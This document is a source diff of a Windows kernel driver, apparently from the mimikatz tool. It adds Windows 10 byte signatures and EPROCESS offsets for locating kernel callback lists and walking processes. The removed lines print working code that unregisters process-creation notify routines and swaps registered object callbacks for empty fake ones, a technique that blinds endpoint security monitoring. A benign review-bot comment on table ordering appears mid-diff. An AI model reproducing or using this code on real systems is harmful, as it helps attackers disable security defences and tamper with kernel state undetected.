{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
KKLL_M_MEMORY_GENERIC ThreadReferences[] = { // PspCreateThreadNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Thread), PTRN_WXP_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xcc, 0xe8};
|
||||
UCHAR PTRN_W23_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xc8, 0xe8};
|
||||
@ -112,15 +118,17 @@ UCHAR PTRN_WVI_Process[] = {0x89, 0x4d, 0x20, 0xff, 0x75, 0x18, 0xe8};
|
||||
UCHAR PTRN_WI7_Process[] = {0x83, 0x65, 0x30, 0x00, 0xff, 0x75, 0x20, 0xe8};
|
||||
UCHAR PTRN_WI8_Process[] = {0x83, 0xc0, 0x40, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x45, 0x9c, 0xbe};
|
||||
UCHAR PTRN_W81_Process[] = {0x89, 0x45, 0x9c, 0x83, 0x65, 0x8c, 0x00, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_Process[] = {0x8b, 0xdf, 0x89, 0x45, 0xf8, 0x8b, 0xd1, 0x8b, 0xc8, 0x57, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Process), PTRN_WXP_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAssignImpersonationToken", L"NtFindAtom", { 19, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Process), PTRN_W10_Process}, L"PoRegisterCoalescingCallback", L"RtlInitCodePageTable", { -4, 64}},
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xf7, 0x57, 0x8b, 0xd0, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = { // PspCreateProcessNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Process), PTRN_WXP_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAssignImpersonationToken", L"NtFindAtom", { 19, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
|
||||
UCHAR PTRN_W23_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
|
||||
@ -128,15 +136,17 @@ UCHAR PTRN_WVI_Image[] = {0xc7, 0x45, 0xfc, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75,
|
||||
UCHAR PTRN_WI7_Image[] = {0xc7, 0x45, 0xfc, 0x40, 0x00, 0x00, 0x00, 0xff, 0x75, 0x10, 0xe8};
|
||||
UCHAR PTRN_WI8_Image[] = {0xbb, 0x08, 0x00, 0x00, 0x00, 0x8b, 0xff, 0xe8};
|
||||
UCHAR PTRN_W81_Image[] = {0x33, 0xff, 0x6a, 0x00, 0x8b, 0xd6, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_Image[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd3, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ImageReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Image), PTRN_WXP_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemProcess", { 6, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemThread", { 6, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"RtlUpcaseUnicodeStringToCountedOemString",L"IoCheckShareAccessEx", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"RtlCopySidAndAttributesArray", L"SeImpersonateClientEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
UCHAR PTRN_W10_1507_Image[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd3, 0x8b, 0xcf, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Image[] = {0x33, 0xf6, 0x53, 0x89, 0x45, 0xfc, 0x8b, 0xde, 0x56, 0x8b, 0xd7, 0x8b, 0xc8, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ImageReferences[] = { // PspLoadImageNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Image), PTRN_WXP_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemProcess", { 6, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemThread", { 6, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"RtlUpcaseUnicodeStringToCountedOemString",L"IoCheckShareAccessEx", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"RtlCopySidAndAttributesArray", L"SeImpersonateClientEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Image), PTRN_W10_1507_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xe0, 0x89, 0x5d, 0xdc, 0xc7, 0x45, 0xe8};
|
||||
UCHAR PTRN_W23_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xd8, 0xc7, 0x45, 0xe8};
|
||||
@ -144,15 +154,16 @@ UCHAR PTRN_WVI_Object[] = {0x3b, 0xc3, 0x88, 0x5c, 0x24, 0x3a, 0x89, 0x5c, 0x24,
|
||||
UCHAR PTRN_WI7_Object[] = {0xc6, 0x44, 0x24, 0x22, 0x00, 0xc6, 0x44, 0x24, 0x23, 0x00, 0x89, 0x74, 0x24, 0x18, 0x89, 0x74, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x24};
|
||||
UCHAR PTRN_WI8_Object[] = {0x33, 0xc0, 0x8b, 0xf8, 0x66, 0x89, 0x44, 0x24, 0x2a, 0x89, 0x44, 0x24, 0x1c, 0x89, 0x7c, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x2c};
|
||||
UCHAR PTRN_W81_Object[] = {0x8d, 0x44, 0x24, 0x14, 0x50, 0x33, 0xc0, 0x89, 0x7c, 0x24, 0x18, 0x50, 0x6a, 0x40};
|
||||
UCHAR PTRN_W10_Object[] = {0x33, 0xd2, 0x66, 0x89, 0x54, 0x24, 0x26, 0x8b, 0xfa, 0x89, 0x54, 0x24, 0x18, 0x89, 0x7c, 0x24, 0x14};
|
||||
KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Object), PTRN_WXP_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x138}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x080}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"SeTokenIsAdmin", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
UCHAR PTRN_W10_Object[] = {0x66, 0x8b, 0x02, 0x49, 0x8d, 0x52, 0x02, 0x66, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
|
||||
KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Object), PTRN_WXP_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x138}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x080}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"SeTokenIsAdmin", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Reg[] = {0x89, 0x7d, 0x10, 0x57, 0xff, 0x75, 0xfc, 0xff, 0x75, 0x08, 0xe8};
|
||||
UCHAR PTRN_W23_Reg[] = {0x89, 0x5d, 0x08, 0x53, 0xff, 0x75, 0xfc, 0x57, 0xe8};
|
||||
@ -160,15 +171,16 @@ UCHAR PTRN_WVI_Reg[] = {0x8b, 0x03, 0x8b, 0x4b, 0x04, 0x3b, 0x46, 0x10, 0x75};
|
||||
UCHAR PTRN_WI7_Reg[] = {0x8b, 0x03, 0x8b, 0x4b, 0x04, 0x3b, 0x46, 0x10, 0x75};
|
||||
UCHAR PTRN_WI8_Reg[] = {0x53, 0x8d, 0x55, 0xd0, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_W81_Reg[] = {0x8b, 0x08, 0x8b, 0x40, 0x04, 0x3b, 0x4e, 0x10, 0x75};
|
||||
UCHAR PTRN_W10_Reg[] = {0x8b, 0x4d, 0x0c, 0x8b, 0x01, 0x8b, 0x49, 0x04, 0x3b, 0x46, 0x10, 0x75};
|
||||
KKLL_M_MEMORY_GENERIC RegReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Reg), PTRN_WXP_Reg}, L"CmRegisterCallback", L"FsRtlMdlReadDev", { -4}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"FsRtlCopyRead", { -4}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmSetCallbackObjectContext", L"EmClientRuleRegisterNotification",{ -8, 0x01c}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmUnRegisterCallback", L"FsRtlIsFatDbcsLegal", { -4, 0x01c}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
UCHAR PTRN_W10_Reg[] = {0x8b, 0x4d, 0x0c, 0x8b, 0x01, 0x8b, 0x49, 0x04, 0x3b};
|
||||
KKLL_M_MEMORY_GENERIC RegReferences[] = { // CallbackListHead
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Reg), PTRN_WXP_Reg}, L"CmRegisterCallback", L"FsRtlMdlReadDev", { -4}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"FsRtlCopyRead", { -4}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmSetCallbackObjectContext", L"EmClientRuleRegisterNotification",{ -8, 0x01c}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmUnRegisterCallback", L"FsRtlIsFatDbcsLegal", { -4, 0x01c}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -349,102 +361,4 @@ NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntr
|
||||
}
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
|
||||
UNICODE_STRING uPsSetCreateProcessNotifyRoutineEx = {66, 68, L"PsSetCreateProcessNotifyRoutineEx"};
|
||||
NTSTATUS kkll_m_notify_init()
|
||||
{
|
||||
SIZE_T codeSize;
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
if(pPsSetCreateProcessNotifyRoutineEx = (PPSSETCREATEPROCESSNOTIFYROUTINEEX) MmGetSystemRoutineAddress(&uPsSetCreateProcessNotifyRoutineEx))
|
||||
|
||||
codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback;
|
||||
if(kkll_m_notify_fakePre = (POB_PRE_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
|
||||
RtlCopyMemory(kkll_m_notify_fakePre, kkll_m_notify_fake_ObjectPreCallback, codeSize);
|
||||
|
||||
codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback;
|
||||
if(kkll_m_notify_fakePost = (POB_POST_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
|
||||
RtlCopyMemory(kkll_m_notify_fakePost, kkll_m_notify_fake_ObjectPostCallback, codeSize);
|
||||
|
||||
|
||||
if(pPsSetCreateProcessNotifyRoutineEx && kkll_m_notify_fakePre && kkll_m_notify_fakePost)
|
||||
status = STATUS_SUCCESS;
|
||||
else
|
||||
{
|
||||
if(kkll_m_notify_fakePre)
|
||||
{
|
||||
ExFreePoolWithTag(kkll_m_notify_fakePre, POOL_TAG);
|
||||
kkll_m_notify_fakePre = NULL;
|
||||
}
|
||||
if(kkll_m_notify_fakePost)
|
||||
{
|
||||
ExFreePoolWithTag(kkll_m_notify_fakePost, POOL_TAG);
|
||||
kkll_m_notify_fakePost = NULL;
|
||||
}
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
|
||||
{
|
||||
NTSTATUS status = STATUS_INVALID_HANDLE;
|
||||
UNICODE_STRING uString;
|
||||
|
||||
if(bufferIn && (szBufferIn == sizeof(PCREATE_PROCESS_NOTIFY_ROUTINE)))
|
||||
{
|
||||
status = PsSetCreateProcessNotifyRoutine(*(PCREATE_PROCESS_NOTIFY_ROUTINE *) bufferIn, TRUE);
|
||||
if(!NT_SUCCESS(status) && pPsSetCreateProcessNotifyRoutineEx)
|
||||
status = pPsSetCreateProcessNotifyRoutineEx(*(PCREATE_PROCESS_NOTIFY_ROUTINE_EX *) bufferIn, TRUE);
|
||||
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
status = kprintf(outBuffer, L"Removed : ");
|
||||
if(NT_SUCCESS(status))
|
||||
status = kkll_m_modules_fromAddr(outBuffer, *(PVOID *) bufferIn);
|
||||
}
|
||||
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
|
||||
NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
|
||||
{
|
||||
NTSTATUS status = STATUS_INVALID_HANDLE;
|
||||
POBJECT_CALLBACK_ENTRY pCallbackEntry;
|
||||
|
||||
if(bufferIn && (szBufferIn == sizeof(POBJECT_CALLBACK_ENTRY)))
|
||||
{
|
||||
if(pCallbackEntry = *(POBJECT_CALLBACK_ENTRY *) bufferIn)
|
||||
{
|
||||
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
if(pCallbackEntry->PreOperation && kkll_m_notify_fakePre)
|
||||
pCallbackEntry->PreOperation = kkll_m_notify_fakePre;
|
||||
if(pCallbackEntry->PostOperation && kkll_m_notify_fakePost)
|
||||
pCallbackEntry->PostOperation = kkll_m_notify_fakePost;
|
||||
|
||||
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
#pragma optimize("", off)
|
||||
OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation)
|
||||
{
|
||||
return OB_PREOP_SUCCESS;
|
||||
}
|
||||
DWORD kkll_m_notify_fake_ObjectPreCallback_end(){return 'kpre';}
|
||||
|
||||
|
||||
VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation)
|
||||
{
|
||||
}
|
||||
DWORD kkll_m_notify_fake_ObjectPostCallback_end(){return 'kpos';}
|
||||
#pragma optimize("", on)
|
||||
}
|
@ -42,21 +42,12 @@ typedef struct _OBJECT_CALLBACK_ENTRY {
|
||||
typedef NTSTATUS (* PPSSETCREATEPROCESSNOTIFYROUTINEEX) ( __in PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, __in BOOLEAN Remove);
|
||||
//typedef VOID (* POBUNREGISTERCALLBACKS) (__in PVOID RegistrationHandle);
|
||||
|
||||
NTSTATUS kkll_m_notify_init();
|
||||
NTSTATUS kkll_m_notify_list_thread(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_process(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_image(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_reg(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
|
||||
|
||||
NTSTATUS kkll_m_notify_list(PKIWI_BUFFER outBuffer, PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax);
|
||||
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);
|
||||
|
||||
|
||||
OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation);
|
||||
DWORD kkll_m_notify_fake_ObjectPreCallback_end();
|
||||
VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation);
|
||||
DWORD kkll_m_notify_fake_ObjectPostCallback_end();
|
||||
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);
|
@ -15,7 +15,8 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* 7 */ {0x00b8, 0x026c, 0x0040},
|
||||
/* 8 */ {0x00b8, 0x00c0, 0x0040, 0x02d4},
|
||||
/* BLUE */ {0x00b8, 0x00c0, 0x0040, 0x02cc},
|
||||
/* 10 */ {0x00b8, 0x00c0, 0x0040, 0x02d4},
|
||||
/* 10_1507*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
/* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
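Review bot: The new `10_1507` and `10_1511` rows are bound to `KiwiOsIndex_10_1507` and `KiwiOsIndex_10_1511` only by their position and the `/* */` label, and the same applies to the x64 table in the next hunk. With `KiwiOsIndex_MAX` raised to 9, a row that is missing or out of order zero-fills silently, after which `kkll_m_process_enum` reads `EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]` as 0 and follows the wrong field of each process in kernel mode. If the toolchain accepts C99 designated initializers, `[KiwiOsIndex_10_1507] = {0x00b8, 0x00c0, 0x0040, 0x02dc},` ties each row to its enumerator; otherwise a comment at the head of the table, `// one row per KIWI_OS_INDEX value, in enum order; keep in sync with KiwiOsIndex_MAX`, records the invariant. The table's opening line is above this hunk.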
@ -24,7 +25,8 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* 7 */ {0x0188, 0x043c, 0x0040},
|
||||
/* 8 */ {0x02e8, 0x02f8, 0x0040, 0x0648},
|
||||
/* BLUE */ {0x02e8, 0x02f8, 0x0040, 0x0678},
|
||||
/* 10 */ {0x02f0, 0x0300, 0x0040, 0x0698},//0x06a9},//0x0698},
|
||||
/* 10_1507*/{0x02f0, 0x0300, 0x0040, 0x06a8},
|
||||
/* 10_1511*/{0x02f0, 0x0300, 0x0040, 0x06b0},
|
||||
#endif
|
||||
};
|
||||
|
||||
@ -34,8 +36,8 @@ NTSTATUS kkll_m_process_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER out
|
||||
PEPROCESS pProcess = NULL;
|
||||
for(
|
||||
pProcess = PsInitialSystemProcess;
|
||||
NT_SUCCESS(status) && (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]))- EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]) != PsInitialSystemProcess;
|
||||
